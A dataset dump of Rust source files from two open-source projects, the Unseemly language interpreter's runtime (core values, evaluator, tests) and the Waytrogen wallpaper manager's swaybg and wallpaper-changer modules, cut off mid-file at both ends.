quite the same as Racket prefab structures. "prefab" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] {"Type" "fn" : "param" => [(vr "T")], "ret" => {"Type" "type_apply" : "type_rator" => (vr "Expr"), "arg" => [(vr "T")]}})}, ( val ) => { AbstractSyntax(val.prefab()) } ), "plus" => tf!([( "Int", "Int" ) -> "Int"], ( Int(a), Int(b) ) => Int( a + b ) ), "minus" => tf!([( "Int", "Int" ) -> "Int"], ( Int(a), Int(b) ) => Int( a - b ) ), "times" => tf!([( "Int", "Int" ) -> "Int"], ( Int(a), Int(b) ) => Int( a * b )), "int_div" => tf!([( "Int", "Int" ) -> "Int"], ( Int(a), Int(b) ) => Int( a / b )), "modulo" => tf!([( "Int", "Int" ) -> "Int"], ( Int(a), Int(b) ) => Int( a % b )), "zero?" => tyf!( {"Type" "fn" : "param" => [ {"Type" "Int" :}], "ret" => (vr "Bool") }, ( Int(a) ) => val!(b a == BigInt::from(0))), "equal?" => tyf!( {"Type" "fn" : "param" => [ {"Type" "Int" :}, {"Type" "Int" :} ], "ret" => (vr "Bool")}, ( Int(a), Int(b) ) => val!(b a == b) ), "and" => tyf!( {"Type" "fn" : "param" => [ (vr "Bool"), (vr "Bool") ], "ret" => (vr "Bool")}, ( Enum(lhs, _) , Enum(rhs, _)) => val!(b (lhs == n("True")) && (rhs == n("True"))) ), "or" => tyf!( {"Type" "fn" : "param" => [ (vr "Bool"), (vr "Bool") ], "ret" => (vr "Bool")}, ( Enum(lhs, _) , Enum(rhs, _)) => val!(b (lhs == n("True")) || (rhs == n("True"))) ), "not" => tyf!( {"Type" "fn" : "param" => [ (vr "Bool") ], "ret" => (vr "Bool")}, ( Enum(arg, _) ) => val!(b !(arg == n("True"))) ), "zero" => tf!( "Int", val!(i 0) ), "one" => tf!( "Int", val!(i 1) ), "two" => tf!( "Int", val!(i 2) ), "three" => tf!( "Int", val!(i 3) ), "four" => tf!( "Int", val!(i 4) ), "five" => tf!( "Int", val!(i 5) ), "six" => tf!( "Int", val!(i 6) ), "seven" => tf!( "Int", val!(i 7) ), "eight" => tf!( "Int", val!(i 8) ), "nine" => tf!( "Int", val!(i 9) ), "ten" => tf!( "Int", val!(i 10) ), "false" => TypedValue { ty: ast!((vr "Bool")), val: val!(b false)}, "true" => TypedValue { ty: ast!((vr "Bool")), val: val!(b true)} ) .set_assoc(&sequence_operations()) .set_assoc(&string_operations()) .set_assoc(&cell_operations()) } pub fn core_values() -> Assoc<Name, Value> { core_typed_values().map(&erase_type) } // Helper for building an environment by reifying a bunch of Rust types macro_rules! reified_ty_env { ( $($t:ty),* ) => { Assoc::new() $( .set(<$t>::ty_name(), <$t>::ty()))* }; } pub fn core_types() -> Assoc<Name, Ast> { use crate::runtime::reify::{Irr, Reifiable}; core_typed_values() .map(&erase_value) .set( n("Bool"), ast!({"Type" "enum" : "name" => [@"c" "True", "False"], "component" => [@"c" [], []]})) .set( n("Option"), ast!({ "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] {"Type" "enum" : "name" => [@"c" "Some", "None"], "component" => [@"c" [], [(vr "T")]]})})) .set( n("Unit"), ast!({"Type" "tuple" : "component" => []})) // These need to be in the environment, not just atomic types // because we sometimes look them up internally in the compiler // in the environment, // not just as programmers, looking them up by syntax, where this whole thing is a wash. .set(n("Pat"), get__primitive_type(n("Pat"))) .set(n("Type"), get__primitive_type(n("Type"))) .set(n("Expr"), get__primitive_type(n("Expr"))) .set(n("Sequence"), get__primitive_type(n("Sequence"))) .set(n("Cell"), get__primitive_type(n("Cell"))) .set_assoc(&reified_ty_env!( Option<Irr>, u8, usize, crate::util::assoc::Assoc<Irr, Irr>, crate::util::mbe::EnvMBE<Irr>, Name, crate::ast::Ast, crate::beta::Beta, crate::beta::ExportBeta, crate::grammar::FormPat, crate::grammar::SyntaxExtension, crate::grammar::Scanner, crate::form::Form, crate::form::EitherPN<Irr, Irr>, crate::ast_walk::WalkRule<Irr>, crate::runtime::eval::QQuote, crate::runtime::eval::QQuoteDestr, crate::runtime::eval::Eval, crate::runtime::eval::Destructure, crate::ty::SynthTy, crate::ty::UnpackTy, crate::ty_compare::Canonicalize, crate::ty_compare::Subtype )) } #[test] fn basic_core_value_evaluation() { use crate::core_forms::find_core_form; let cte = core_typed_values(); let ce = cte.map(&erase_type); assert_eq!( eval( &ast!({ find_core_form( "Expr", "apply") ; "rator" => (vr "plus"), "rand" => [ (vr "one"), (vr "one") ] }), ce ), Ok(Int(BigInt::from(2))) ); } #[test] fn fixpoint_evaluation() { assert_eq!( eval( &ast!( {"Expr" "apply" : "rator" => { "Expr" "apply" : "rator" => (vr "fix"), "rand" => [{ "Expr" "lambda" : "param" => [@"p" "again" ], "p_t" => [@"p" /* TODO */ (vr "TODO") ], "body" => (import [* ["param" : "p_t"]] { "Expr" "lambda" : "param" => [@"p" "n" ], "p_t" => [@"p" { "Type" "Int" : } ], "body" => (import [* ["param" : "p_t"]] { "Expr" "match" : "scrutinee" => { "Expr" "apply" : "rator" => (vr "zero?"), "rand" => [(vr "n")] }, "p" => [@"c" {"Pat" "enum_pat" : "component" => [], "name" => "True" }, {"Pat" "enum_pat" : "component" => [], "name" => "False" }], "arm" => [@"c" (import ["p" = "scrutinee"] (vr "one")), (import ["p" = "scrutinee"] { "Expr" "apply" : "rator" => (vr "times"), "rand" => [(vr "n"), { "Expr" "apply" : "rator" => { "Expr" "apply" : "rator" => (vr "again"), "rand" => []}, "rand" => [{ "Expr" "apply" : "rator" => (vr "minus"), "rand" => [(vr "n"), (vr "one")]}]}]})]})})}]}, "rand" => [(vr "five")]}), core_values() ), Ok(val!(i 120)) ); } #[test] fn type_sequence_operations() { let mut prelude = core_types(); use crate::ty::synth_type; assert_eq!(synth_type(&u!({apply : len [empty]}), prelude.clone()), Ok(uty!({Int :}))); assert_eq!( synth_type(&u!({apply : push [{apply : push [empty ; one]} ; two]}), prelude.clone()), synth_type(&uty!({type_apply : Sequence [{Int :}]}), prelude.clone()) ); prelude = prelude.set( n("one_two"), synth_type(&uty!({type_apply : Sequence [{Int :}]}), prelude.clone()).unwrap(), ); assert_eq!( synth_type(&u!({apply : index [one_two ; one]}), prelude.clone()), Ok(uty!({Int :})) ); assert_eq!( synth_type(&u!({apply : map [one_two ; (, ast!((vr "zero?"))) ]}), prelude.clone()), synth_type(&uty!({type_apply : Sequence [Bool]}), prelude.clone()) ); assert_eq!( synth_type(&u!({apply : foldl [one_two ; zero ; plus ]}), prelude.clone()), Ok(uty!({Int :})) ); } #[test] fn eval_sequence_operations() { let mut prelude = core_values(); assert_eq!(eval(&u!({apply : len [empty]}), prelude.clone()), Ok(val!(i 0))); assert_eq!( eval(&u!({apply : push [{apply : push [empty ; one]} ; two]}), prelude.clone()), Ok(val!(seq (i 1) (i 2))) ); prelude = prelude.set(n("one_two"), val!(seq (i 1) (i 2))); assert_eq!(eval(&u!({apply : index [one_two ; one]}), prelude.clone()), Ok(val!(i 2))); assert_eq!( eval(&u!({apply : map [one_two ; (, ast!((vr "zero?"))) ]}), prelude.clone()), Ok(val!(seq (b false) (b false))) ); assert_eq!(eval(&u!({apply : foldl [one_two ; zero ; plus ]}), prelude.clone()), Ok(val!(i 3))); } #[test] fn eval_string_operations() { let mut prelude = core_values(); prelude = prelude.set(n("first"), val!(s "Frederick")); prelude = prelude.set(n("last"), val!(s "Douglass")); assert_eq!( eval(&u!({apply : concat [first; last]}), prelude.clone()), Ok(val!(s "FrederickDouglass")) ); prelude = prelude.set(n("names"), val!(seq (s "Frederick") (s "Douglass"))); prelude = prelude.set(n("space"), val!(s " ")); assert_eq!( eval(&u!({apply : join [names; space]}), prelude.clone()), Ok(val!(s "Frederick Douglass")) ); } #[test] fn eval_cell_operations() { let prelude = core_values().set(n("c"), val!(cell (i 5))); assert_eq!( eval( &u!( {block : [(~ {apply : assign [c ; {apply : plus [one ; {apply : value [c]}]}]})] {apply : value [c]} }), prelude.clone() ), Ok(val!(i 6)) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/mod.rs
src/runtime/mod.rs
pub mod core_values; pub mod eval; pub mod reify;
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/eval.rs
src/runtime/eval.rs
#![macro_use] use crate::{ ast::Ast, ast_walk::{walk, LazyWalkReses, WalkRule}, form::Form, name::*, util::assoc::Assoc, walk_mode::{NegativeWalkMode, WalkMode}, }; use num::bigint::BigInt; use std::{self, rc::Rc}; /// Values in Unseemly. #[derive(Debug, Clone, PartialEq)] pub enum Value { Int(BigInt), Sequence(Vec<Rc<Value>>), // TODO: switch to a different core sequence type Function(Rc<Closure>), // TODO: unsure if this Rc is needed BuiltInFunction(BIF), AbstractSyntax(Ast), Struct(Assoc<Name, Value>), Enum(Name, Vec<Value>), // Hypothesis: all strings are either // in a formal language (and should be stored as ASTs instead) // or in a human language (and should be tokens for localization). // But for now, here's a plain string. Text(String), Cell(Rc<std::cell::RefCell<Value>>), // Reifying `Form`s causes loss of identity, so have an explicit (opaque) representation. // Perhaps drop reification entirely, and just use an opaque type based on `std::any::Any`? ParseContext(Box<crate::earley::ParseContext>), } pub use self::Value::*; #[derive(Debug, Clone, PartialEq)] pub struct Closure { pub body: Ast, pub params: Vec<Name>, pub env: Assoc<Name, Value>, } impl Value { /// Turns this `Value` into a "magic" `Ast` that evaluates to it. /// The `Ast` will have the universal type pub fn prefab(self) -> Ast { raw_ast!(Node( typed_form!( "prefab_internal", (impossible), // no syntax // TODO: Do we even need to be well-typed? cust_rc_box!(move |_| Ok(ast!( // Cheat: has the universal type, but we know it's safe because <mumble>. {"Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] (vr "T"))}))), cust_rc_box!(move |_| Ok(self.clone())) ), crate::util::mbe::EnvMBE::new(), crate::beta::ExportBeta::Nothing )) } } // Built-in function pub struct BIF(pub Rc<(dyn Fn(Vec<Value>) -> Value)>); pub fn apply__function_value(f: &Value, args: Vec<Value>) -> Value { match *f { BuiltInFunction(BIF(ref f)) => f(args.into_iter().collect()), Function(ref cl) => { let mut clo_env = cl.env.clone(); if cl.params.len() != args.len() { panic!( "[type error] Attempted to apply {} arguments to function requiring {} \ parameters", args.len(), cl.params.len() ); } for (p, a) in cl.params.iter().zip(args.into_iter()) { clo_env = clo_env.set(*p, a) } eval(&cl.body, clo_env).unwrap() } _ => panic!("[type error] {:#?} is not a function", f), } } impl PartialEq for BIF { fn eq(&self, other: &BIF) -> bool { self as *const BIF == other as *const BIF } } impl Clone for BIF { fn clone(&self) -> BIF { BIF(self.0.clone()) } } impl std::fmt::Display for Value { fn fmt(&self, f: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { match *self { Int(ref bi) => write!(f, "{}", bi), Sequence(ref seq) => { for elt in seq { write!(f, "{}", &*elt)?; } Ok(()) } Function(_) => write!(f, "[closure]"), BuiltInFunction(_) => write!(f, "[built-in function]"), AbstractSyntax(ref ast) => write!(f, "'[{}]'", ast), Struct(ref parts) => { write!(f, "*[")?; for (k, v) in parts.iter_pairs() { write!(f, "{}: {} ", k, v)?; } write!(f, "]*") } Enum(n, ref parts) => { write!(f, "+[{}", n)?; for p in parts.iter() { write!(f, " {}", p)?; } write!(f, "]+") } Text(ref st) => write!(f, "{}", st), Cell(ref cell) => write!(f, "{}", cell.borrow()), ParseContext(_) => write!(f, "[a language]"), } } } impl std::fmt::Debug for BIF { fn fmt(&self, formatter: &mut std::fmt::Formatter) -> Result<(), std::fmt::Error> { formatter.write_str("[built-in function]") } } impl crate::walk_mode::WalkElt for Value { fn from_ast(a: &Ast) -> Value { AbstractSyntax(a.clone()) } fn to_ast(&self) -> Ast { match *self { AbstractSyntax(ref a) => a.clone(), _ => icp!("[type error] {} is not syntax", self), } } } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct Eval {} } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct Destructure {} } impl WalkMode for Eval { fn name() -> &'static str { "Evalu" } type Elt = Value; type Negated = Destructure; type AsPositive = Eval; type AsNegative = Destructure; type Err = (); type D = crate::walk_mode::Positive<Eval>; type ExtraInfo = (); fn get_walk_rule(f: &Form) -> WalkRule<Eval> { // Macro invocations use `eval`, to avoid having a whole extra field in `Form`: if f.name == n("macro_invocation") { icp!("unexpanded macro!") } f.eval.pos().clone() } fn automatically_extend_env() -> bool { true } fn walk_var(n: Name, cnc: &LazyWalkReses<Eval>) -> Result<Value, ()> { match cnc.env.find(&n) { Some(v) => Ok(v.clone()), None => panic!("Undefined var `{}` in {}", n, cnc.env), } } // TODO: maybe keep this from being called? fn underspecified(_: Name) -> Value { val!(enum "why is this here?", ) } } impl WalkMode for Destructure { fn name() -> &'static str { "Destr" } type Elt = Value; type Negated = Eval; type AsPositive = Eval; type AsNegative = Destructure; type Err = (); type D = crate::walk_mode::Negative<Destructure>; type ExtraInfo = (); /// The whole point of program evaluation is that the enviornment /// isn't generateable from the source tree. /// Does that make sense? I suspect it does not. fn get_walk_rule(f: &Form) -> WalkRule<Destructure> { f.eval.neg().clone() } fn automatically_extend_env() -> bool { true } // TODO: think about this } impl NegativeWalkMode for Destructure { fn needs_pre_match() -> bool { false } // Values don't have binding (in this mode!) } impl crate::walk_mode::WalkElt for Ast { fn from_ast(a: &Ast) -> Ast { a.clone() } fn to_ast(&self) -> Ast { self.clone() } } pub fn eval_top(expr: &Ast) -> Result<Value, ()> { eval(expr, Assoc::new()) } pub fn eval(expr: &Ast, env: Assoc<Name, Value>) -> Result<Value, ()> { walk::<Eval>(expr, &LazyWalkReses::new_wrapper(env)) } pub fn neg_eval(pat: &Ast, env: Assoc<Name, Value>) -> Result<Assoc<Name, Value>, ()> { walk::<Destructure>(pat, &LazyWalkReses::new_wrapper(env)) } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct QQuote {} } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct QQuoteDestr {} } impl WalkMode for QQuote { fn name() -> &'static str { "QQuote" } // Why not `Ast`? Because QQuote and Eval need to share environments. type Elt = Value; type Negated = QQuoteDestr; type AsPositive = QQuote; type AsNegative = QQuoteDestr; type Err = (); type D = crate::walk_mode::Positive<QQuote>; type ExtraInfo = (); fn walk_var(n: Name, _: &LazyWalkReses<Self>) -> Result<Value, ()> { Ok(val!(ast (vr n))) } fn walk_atom(n: Name, _: &LazyWalkReses<Self>) -> Result<Value, ()> { Ok(val!(ast (at n))) } // TODO #26: Just special-case "unquote" and "dotdotdot" fn get_walk_rule(f: &Form) -> WalkRule<QQuote> { f.quasiquote.pos().clone() } fn automatically_extend_env() -> bool { false } } impl WalkMode for QQuoteDestr { fn name() -> &'static str { "QQDes" } type Elt = Value; type Negated = QQuote; type AsPositive = QQuote; type AsNegative = QQuoteDestr; type Err = (); type D = crate::walk_mode::Negative<QQuoteDestr>; type ExtraInfo = (); fn walk_var(n: Name, cnc: &LazyWalkReses<Self>) -> Result<Assoc<Name, Value>, ()> { let val = val!(ast (vr n)); if cnc.context_elt() == &val { Ok(Assoc::<Name, Value>::new()) } else { Err(Self::qlit_mismatch_error(val, cnc.context_elt().clone())) } } fn walk_atom(n: Name, cnc: &LazyWalkReses<Self>) -> Result<Assoc<Name, Value>, ()> { let val = val!(ast (at n)); if cnc.context_elt() == &val { Ok(Assoc::<Name, Value>::new()) } else { Err(Self::qlit_mismatch_error(val, cnc.context_elt().clone())) } } // TODO #26: Just special-case "unquote" fn get_walk_rule(f: &Form) -> WalkRule<QQuoteDestr> { f.quasiquote.neg().clone() } fn automatically_extend_env() -> bool { false } } impl NegativeWalkMode for QQuoteDestr { fn needs_pre_match() -> bool { true } // Quoted syntax does have binding! } // `env` is a trap! We want a shifted `LazyWalkReses`! // pub fn qquote(expr: &Ast, env: Assoc<Name, Value>) -> Result<Value, ()> { // walk::<QQuote>(expr, &LazyWalkReses::new_wrapper(env)) // } // // pub fn qquote_destr(pat: &Ast, env: Assoc<Name, Value>) // -> Result<Assoc<Name, Value>,()> { // walk::<QQuoteDestr>(pat, &LazyWalkReses::new_wrapper(env)) // }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/swaybg.rs
src/swaybg.rs
use crate::{common::RGB, wallpaper_changers::WallpaperChangers}; use gettextrs::gettext; use gtk::{ gdk::RGBA, gio::Settings, glib::{self, clone}, prelude::*, Align, Box, ColorDialog, ColorDialogButton, DropDown, TextBuffer, }; use log::debug; use std::{path::Path, process::Command}; pub fn change_swaybg_wallpaper(swaybg_changer: WallpaperChangers, image: &Path, monitor: &str) { if let WallpaperChangers::Swaybg(mode, rgb) = swaybg_changer { let mut command = Command::new("swaybg"); if monitor != gettext("All") { command.arg("-o").arg(monitor); } command .arg("-i") .arg(image.to_str().unwrap()) .arg("-m") .arg(mode.to_string()) .arg("-c") .arg(rgb) .spawn() .unwrap() .wait() .unwrap(); } } pub fn generate_swaybg_changer_bar(changer_specific_options_box: &Box, settings: &Settings) { let dropdown = DropDown::from_strings(&[ &gettext("stretch"), &gettext("fit"), &gettext("fill"), &gettext("center"), &gettext("tile"), &gettext("solid_color"), ]); dropdown.set_halign(Align::Start); dropdown.set_valign(Align::Center); dropdown.set_margin_top(12); dropdown.set_margin_start(12); dropdown.set_margin_bottom(12); dropdown.set_margin_end(12); changer_specific_options_box.append(&dropdown); let color_dialog = ColorDialog::builder().with_alpha(false).build(); let color_picker = ColorDialogButton::builder() .halign(Align::Start) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .dialog(&color_dialog) .build(); changer_specific_options_box.append(&color_picker); settings.bind("swaybg-mode", &dropdown, "selected").build(); let rgb_text_buffer = TextBuffer::builder().build(); color_picker.connect_rgba_notify(clone!( #[weak] settings, move |b| { let rgba = b.rgba(); let serialize_struct = RGB { red: rgba.red(), green: rgba.green(), blue: rgba.blue(), } .to_string(); debug!("{}: {}", gettext("Serialized RGB"), serialize_struct); rgb_text_buffer.set_text(&serialize_struct); settings .bind("swaybg-color", &rgb_text_buffer, "text") .build(); } )); let rgb = settings .string("swaybg-color") .to_string() .parse::<RGB>() .unwrap(); color_picker.set_rgba( &RGBA::builder() .red(rgb.red) .green(rgb.green) .blue(rgb.blue) .build(), ); }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/lib.rs
src/lib.rs
pub mod cli; pub mod common; pub mod database; pub mod dotfile; pub mod fs; pub mod hyprpaper; pub mod main_window; pub mod mpvpaper; pub mod swaybg; pub mod swww; pub mod ui_common; pub mod wallpaper_changers;
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/fs.rs
src/fs.rs
use crate::{common::sort_by_sort_dropdown_string, wallpaper_changers::WallpaperChangers}; use std::path::PathBuf; #[must_use] pub fn get_image_files( path: &str, sort_dropdown: &str, invert_sort_switch_state: bool, ) -> Vec<PathBuf> { let mut files = walkdir::WalkDir::new(path).follow_links(true).follow_root_links(true) .into_iter() .filter_map(std::result::Result::ok) .filter(|f| f.file_type().is_file()) .map(|d| d.path().to_path_buf()) .filter(|p| { WallpaperChangers::all_accepted_formats().iter().any(|f| { f == p .extension() .unwrap_or_default() .to_str() .unwrap_or_default() }) }) .collect::<Vec<_>>(); sort_by_sort_dropdown_string(&mut files, sort_dropdown, invert_sort_switch_state); files }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/wallpaper_changers.rs
src/wallpaper_changers.rs
use crate::{ common::RGB, hyprpaper::change_hyprpaper_wallpaper, mpvpaper::change_mpvpaper_wallpaper, swaybg::change_swaybg_wallpaper, swww::change_swww_wallpaper, }; use lazy_static::lazy_static; use regex::Regex; use serde::{Deserialize, Serialize}; use std::{fmt::Display, path::PathBuf, process::Command, str::FromStr, thread}; use strum::{IntoEnumIterator, VariantArray}; use strum_macros::{EnumIter, IntoStaticStr, VariantArray}; use which::which; pub trait WallpaperChanger { fn change(self, image: PathBuf, monitor: String); fn accepted_formats(&self) -> Vec<String>; fn kill(&self); } pub trait U32Enum { fn from_u32(i: u32) -> Self; fn to_u32(&self) -> u32; } #[derive(Debug, EnumIter, Clone, Default, Serialize, Deserialize, PartialEq)] pub enum WallpaperChangers { #[default] Hyprpaper, Swaybg(SwaybgModes, String), MpvPaper(MpvPaperPauseModes, MpvPaperSlideshowSettings, String), Swww( SWWWResizeMode, RGB, SWWWScallingFilter, SWWWTransitionType, u8, u32, u32, u16, SWWWTransitionPosition, bool, SWWWTransitionBezier, SWWWTransitionWave, ), } impl WallpaperChangers { pub fn killall_changers() { for changer in WallpaperChangers::iter() { changer.kill(); } } fn kill_all_changers_except(changer: &WallpaperChangers) { let varient = match changer { Self::Hyprpaper => Self::Hyprpaper, Self::Swaybg(_, _) => Self::Swaybg(SwaybgModes::default(), String::default()), Self::MpvPaper(_, _, _) => Self::MpvPaper( MpvPaperPauseModes::default(), MpvPaperSlideshowSettings::default(), String::default(), ), Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => Self::Swww( SWWWResizeMode::default(), RGB::default(), SWWWScallingFilter::default(), SWWWTransitionType::default(), u8::default(), u32::default(), u32::default(), u16::default(), SWWWTransitionPosition::default(), bool::default(), SWWWTransitionBezier::default(), SWWWTransitionWave::default(), ), }; WallpaperChangers::iter().for_each(|w| { if w != varient { w.kill(); } }); } #[must_use] pub fn all_accepted_formats() -> Vec<String> { let mut accepted_formats = vec![]; for changer in WallpaperChangers::iter() { for format in changer.accepted_formats() { if !accepted_formats.contains(&format) { accepted_formats.push(format); } } } accepted_formats } } #[derive(Debug, Clone, IntoStaticStr, VariantArray, Default, Serialize, Deserialize, PartialEq)] pub enum SwaybgModes { Stretch, Fit, #[default] Fill, Center, Tile, SolidColor, } #[derive(Debug, Clone, IntoStaticStr, VariantArray, Default, Serialize, Deserialize, PartialEq)] pub enum MpvPaperPauseModes { None, #[default] AutoPause, AutoStop, } #[derive(Debug, Clone, Default, Serialize, Deserialize, PartialEq)] pub struct MpvPaperSlideshowSettings { pub enable: bool, pub seconds: u32, } #[derive(Debug, Default, Serialize, Deserialize, Clone, VariantArray, PartialEq)] pub enum SWWWResizeMode { No, #[default] Crop, Fit, } impl U32Enum for SWWWResizeMode { fn from_u32(i: u32) -> Self { #[allow(clippy::cast_possible_truncation)] let i = i % Self::VARIANTS.len() as u32; match i { 0 => Self::No, 1 => Self::Crop, 2 => Self::Fit, _ => Self::default(), } } fn to_u32(&self) -> u32 { match self { Self::No => 0, Self::Crop => 1, Self::Fit => 2, } } } impl Display for SWWWResizeMode { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::No => write!(f, "no"), Self::Crop => write!(f, "crop"), Self::Fit => write!(f, "fit"), } } } #[derive(Debug, Default, Serialize, Deserialize, Clone, VariantArray, PartialEq)] pub enum SWWWScallingFilter { Nearest, Bilinear, CatmullRom, Mitchell, #[default] Lanczos3, } impl U32Enum for SWWWScallingFilter { fn from_u32(i: u32) -> Self { #[allow(clippy::cast_possible_truncation)] let i = i % Self::VARIANTS.len() as u32; match i { 0 => Self::Nearest, 1 => Self::Bilinear, 2 => Self::CatmullRom, 3 => Self::Mitchell, 4 => Self::Lanczos3, _ => Self::default(), } } fn to_u32(&self) -> u32 { match self { Self::Nearest => 0, Self::Bilinear => 1, Self::CatmullRom => 2, Self::Mitchell => 3, Self::Lanczos3 => 4, } } } impl Display for SWWWScallingFilter { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::Nearest => write!(f, "Nearest"), Self::Bilinear => write!(f, "Bilinear"), Self::CatmullRom => write!(f, "CatmullRom"), Self::Mitchell => write!(f, "Mitchell"), Self::Lanczos3 => write!(f, "Lanczos3"), } } } #[derive(Debug, Default, Serialize, Deserialize, Clone, VariantArray, PartialEq)] pub enum SWWWTransitionType { None, #[default] Simple, Fade, Left, Right, Top, Bottom, Wipe, Wave, Grow, Center, Any, Outer, Random, } impl U32Enum for SWWWTransitionType { fn from_u32(i: u32) -> Self { #[allow(clippy::cast_possible_truncation)] let i = i % Self::VARIANTS.len() as u32; match i { 0 => Self::None, 1 => Self::Simple, 2 => Self::Fade, 3 => Self::Left, 4 => Self::Right, 5 => Self::Top, 6 => Self::Bottom, 7 => Self::Wipe, 8 => Self::Wave, 9 => Self::Grow, 10 => Self::Center, 11 => Self::Any, 12 => Self::Outer, 13 => Self::Random, _ => Self::default(), } } fn to_u32(&self) -> u32 { match self { Self::None => 0, Self::Simple => 1, Self::Fade => 2, Self::Left => 3, Self::Right => 4, Self::Top => 5, Self::Bottom => 6, Self::Wipe => 7, Self::Wave => 8, Self::Grow => 9, Self::Center => 10, Self::Any => 11, Self::Outer => 12, Self::Random => 13, } } } impl Display for SWWWTransitionType { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::None => write!(f, "none"), Self::Simple => write!(f, "simple"), Self::Fade => write!(f, "fade"), Self::Left => write!(f, "left"), Self::Right => write!(f, "right"), Self::Top => write!(f, "top"), Self::Bottom => write!(f, "bottm"), Self::Wipe => write!(f, "wipe"), Self::Wave => write!(f, "wave"), Self::Grow => write!(f, "grow"), Self::Center => write!(f, "center"), Self::Any => write!(f, "any"), Self::Outer => write!(f, "outer"), Self::Random => write!(f, "random"), } } } #[derive(Debug, Default, Serialize, Deserialize, Clone, PartialEq)] pub struct SWWWTransitionPosition { pub position: String, } impl Display for SWWWTransitionPosition { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{}", self.position) } } lazy_static! { static ref swww_transition_pos_regex: Regex = Regex::new(r"(0.\d\d?,0\.\d\d?)|(\d+,\d+)|(center|top|left|right|bottom|top-left|top-right|bottom-left|bottom-right)").unwrap(); } impl SWWWTransitionPosition { pub fn new(s: &str) -> anyhow::Result<SWWWTransitionPosition> { if swww_transition_pos_regex.is_match(s) { Ok(Self { position: s.to_owned(), }) } else { Err(anyhow::anyhow!("Invalid Transition Position")) } } } #[derive(Debug, Serialize, Deserialize, Clone, PartialEq)] pub struct SWWWTransitionBezier { pub p0: f64, pub p1: f64, pub p2: f64, pub p3: f64, } impl Display for SWWWTransitionBezier { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{},{},{},{}", self.p0, self.p1, self.p2, self.p3) } } impl Default for SWWWTransitionBezier { fn default() -> Self { Self { p0: 0.54, p1: 0.0, p2: 0.34, p3: 0.99, } } } #[derive(Debug, Serialize, Deserialize, Clone, PartialEq)] pub struct SWWWTransitionWave { pub width: u32, pub height: u32, } impl Display for SWWWTransitionWave { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{},{}", self.width, self.height) } } impl Default for SWWWTransitionWave { fn default() -> Self { Self { width: 20, height: 20, } } } impl U32Enum for SwaybgModes { fn from_u32(i: u32) -> SwaybgModes { let i = (i as usize) % SwaybgModes::VARIANTS.len(); match i { 1 => Self::Fit, 2 => Self::Fill, 3 => Self::Center, 4 => Self::Tile, 5 => Self::SolidColor, _ => Self::Stretch, } } fn to_u32(&self) -> u32 { match self { Self::Stretch => 0, Self::Fit => 1, Self::Fill => 2, Self::Center => 3, Self::Tile => 4, Self::SolidColor => 5, } } } impl U32Enum for MpvPaperPauseModes { fn from_u32(i: u32) -> MpvPaperPauseModes { let i = (i as usize) % MpvPaperPauseModes::VARIANTS.len(); match i { 1 => Self::AutoPause, 2 => Self::AutoStop, _ => Self::None, } } fn to_u32(&self) -> u32 { match self { Self::None => 0, Self::AutoPause => 1, Self::AutoStop => 2, } } } impl FromStr for SwaybgModes { type Err = String; fn from_str(s: &str) -> Result<Self, Self::Err> { match &s.to_ascii_lowercase()[..] { "stretch" => Ok(Self::Stretch), "fit" => Ok(Self::Fit), "fill" => Ok(Self::Fill), "center" => Ok(Self::Center), "tile" => Ok(Self::Tile), "solid_color" => Ok(Self::SolidColor), _ => Err(format!("Unknown swaybg mode: {s}")), } } } impl Display for SwaybgModes { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::Stretch => write!(f, "stretch"), Self::Fit => write!(f, "fit"), Self::Fill => write!(f, "fill"), Self::Center => write!(f, "center"), Self::Tile => write!(f, "tile"), Self::SolidColor => write!(f, "solid_color"), } } } impl FromStr for MpvPaperPauseModes { type Err = String; fn from_str(s: &str) -> Result<Self, Self::Err> { match &s.to_lowercase()[..] { "none" => Ok(Self::None), "auto-pause" => Ok(Self::AutoPause), "auto-stop" => Ok(Self::AutoStop), _ => Err("Invalid pause mode".to_owned()), } } } impl Display for MpvPaperPauseModes { fn 